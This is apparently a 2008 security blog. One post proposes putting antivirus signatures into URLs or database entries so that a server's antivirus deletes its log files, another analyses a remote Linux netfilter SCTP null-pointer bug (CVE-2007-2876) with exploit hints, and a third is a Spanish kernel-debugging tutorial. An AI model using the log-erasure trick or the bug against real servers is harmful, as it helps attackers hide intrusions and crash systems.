miércoles, junio 25, 2008

Erasing or Blocking logs remotelly

Monday I dreamt some new web-hacking techniques, now I only remember one:

If you write in the url an eicar, loveletter or any virus fingerprint, the antivirus blocks or deletes the log files, or also the logfile can be sended to the AV company if you write a suspicious pattern.

ex: http://web.com/index.php?<virus pattern>


What about inserting in BD this patterns? If you register in a web, and submit the pattern in de BD, maybe some BD files will be blocked or deleted by the antivirus.

This also can be a vector to exploit some local AV flaws.

NOTE: only Panda detects eicars that are not at the beginning of the file, must use other patterns.

lunes, junio 16, 2008

Linux remote null pointer derreference (CVE-2007-2876)

The linux netfilter connection tracking new_state() function has a vulnerability exploitable remotelly.

sctp_new();

newconntrack = new_state(IP_CT_DIR_ORIGINAL, SCTP_CONNTRACK_NONE, sch->type);
if (newconntrack == SCTP_CONNTRACK_MAX) {
pr_debug("nf_conntrack_sctp: invalid new deleting.\n");
return 0;
}

Max is not allowed, conntrack_none shouldn't be allowed too.

conntrack->proto.sctp.state = newconntrack;

State will be zero.

sctp_packet() for returning the veredict of the packet, take the state 0:

oldsctpstate = conntrack->proto.sctp.state;
newconntrack = new_state(CTINFO2DIR(ctinfo), oldsctpstate, sch->type);

And then give a null ptr:
nf_ct_refresh_acct(conntrack, ctinfo, skb, *sctp_timeouts[newconntrack]);

becouse sctp_timeouts[SCTP_CONNTRACK_NONE ] is null, it has not a callback:

static unsigned int * sctp_timeouts[]
= { NULL, /* SCTP_CONNTRACK_NONE */
&nf_ct_sctp_timeout_closed, /* SCTP_CONNTRACK_CLOSED */
&nf_ct_sctp_timeout_cookie_wait, /* SCTP_CONNTRACK_COOKIE_WAIT */
&nf_ct_sctp_timeout_cookie_echoed, /* SCTP_CONNTRACK_COOKIE_ECHOED */
&nf_ct_sctp_timeout_established, /* SCTP_CONNTRACK_ESTABLISHED */
&nf_ct_sctp_timeout_shutdown_sent, /* SCTP_CONNTRACK_SHUTDOWN_SENT */
&nf_ct_sctp_timeout_shutdown_recd, /* SCTP_CONNTRACK_SHUTDOWN_RECD */
&nf_ct_sctp_timeout_shutdown_ack_sent /* SCTP_CONNTRACK_SHUTDOWN_ACK_SENT */
}


To exploit this you have to create:
socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)
and set the sockopt SCTP_STATUS to zero.

Becouse of this option is read only, you will need to construct the raw sctp packet :)

The victym must have a SCTP service, and the oops probably doensnt crash the system.

domingo, junio 08, 2008

kernel hacking

[will be translated]
He no he probado todos los kernel debuggers para linux, pero lo mas decente que he encontrado para representar las estructuras es ddd conectado por tap0 al qemu en modo -s.


1. Bajar fuentes del kernel a depurar

En el kernel activaremos la compatibilidad .config
Como que depuraremos ese kernel bajo qemu, podemos tener todas las opciones de debug activadas, princincipalmente estas.

.config
CONFIG_DEBUG_KERNEL=y
CONFIG_DEBUG_BUGVERBOSE=y
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_STACKOVERFLOW=y
CONFIG_DEBUG_PAGEALLOC=y

compilaremos con make

2. Necesitamos generar un image.img con dd, formateamos (por ej ext2) y creamos un subsitema linux por ej con un debian debootstrap :)

la montamos:
modprobe loop
mount image.img img/ -o loop

si no carga el driver loop fijo k lo tienes, buscalo ;)


3. qemu

Tenemos la imagen de disco image.img, el kernel comprimido bzImage y sin comprimir vmlinux
Botamos qemu con la imagen de disco y el bzImage

qemu -boot c -kernel linux-2.6.*.*/arch/i386/boot/bzImage -hda ./image.img -append "root=/dev/hda clock=pit" -s

el -s es el modo kernel debug por el puerto 1234


4. ddd o gdb

ddd tiene la ventaja que podremos dibujar las estructuras.

Arrancamos el ddd con el vmlinux recien compilado. (no sirve bzImage)
ddd vmlinux

(gdb) target remote localhost:1234

vamos a chequearlo:
(gdb) b sys_open
(gdb) c

probamos por ej un simple ls que invocara la syscall open

Ahora con el ddd podremos displayar cualquier estructura por ej:



kernel developer sha0wiki